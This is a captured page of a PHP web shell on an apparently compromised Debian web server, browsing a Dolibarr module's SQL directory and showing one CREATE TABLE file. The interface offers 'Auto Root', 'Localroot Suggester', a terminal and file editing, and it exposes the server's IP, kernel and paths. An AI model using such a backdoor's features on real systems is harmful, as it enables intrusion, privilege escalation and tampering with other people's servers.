Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.119
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
ctm.bdcloud.fr /
custom /
edisuivi /
sql /
Delete
Unzip
Name
Size
Permission
Date
Action
llx_edisuivi_commentaire.key.sql
1.13
KB
-rw-r--r--
2021-01-28 00:29
llx_edisuivi_commentaire.sql
1.06
KB
-rw-r--r--
2021-01-28 00:29
llx_edisuivi_commentaire.sql.back
1.04
KB
-rw-r--r--
2021-01-28 00:29
llx_edisuivi_commentaire_extrafields.key.sql
884
B
-rw-r--r--
2021-01-28 00:29
llx_edisuivi_commentaire_extrafields.sql
1.02
KB
-rw-r--r--
2021-01-28 00:29
llx_edisuivi_commentairelinkorder.sql.back
1
KB
-rw-r--r--
2021-01-28 00:29
llx_edisuivi_entreprise.key.sql
1.2
KB
-rw-r--r--
2021-01-28 00:29
llx_edisuivi_entreprise.sql
1.07
KB
-rw-r--r--
2021-01-28 00:29
llx_edisuivi_entreprise.sql.back
1.04
KB
-rw-r--r--
2021-01-28 00:29
llx_edisuivi_entreprise_extrafields.key.sql
883
B
-rw-r--r--
2021-01-28 00:29
llx_edisuivi_entreprise_extrafields.sql
1.02
KB
-rw-r--r--
2021-01-28 00:29
llx_edisuivi_myobject_extrafields.key.sql
843
B
-rw-r--r--
2021-01-28 00:29
llx_edisuivi_test.sql.back
1.01
KB
-rw-r--r--
2021-01-28 00:29
llx_edisuivi_utilisateur.key.sql
1.31
KB
-rw-r--r--
2021-01-28 00:29
llx_edisuivi_utilisateur.sql
1.13
KB
-rw-r--r--
2021-01-28 00:29
llx_edisuivi_utilisateur.sql.back
1.07
KB
-rw-r--r--
2021-01-28 00:29
llx_edisuivi_utilisateur_extrafields.key.sql
884
B
-rw-r--r--
2021-01-28 00:29
llx_edisuivi_utilisateur_extrafields.sql
1.02
KB
-rw-r--r--
2021-01-28 00:29
Save
Rename
-- Copyright (C) ---Put here your own copyright and developer email--- -- -- This program is free software: you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation, either version 3 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License -- along with this program. If not, see https://www.gnu.org/licenses/. CREATE TABLE llx_edisuivi_commentaire( -- BEGIN MODULEBUILDER FIELDS rowid integer AUTO_INCREMENT PRIMARY KEY NOT NULL, origin_id integer NOT NULL, date_creation datetime NOT NULL, text text NOT NULL, date_modification datetime, edited integer, fk_soc integer, fk_user integer -- END MODULEBUILDER FIELDS ) ENGINE=innodb;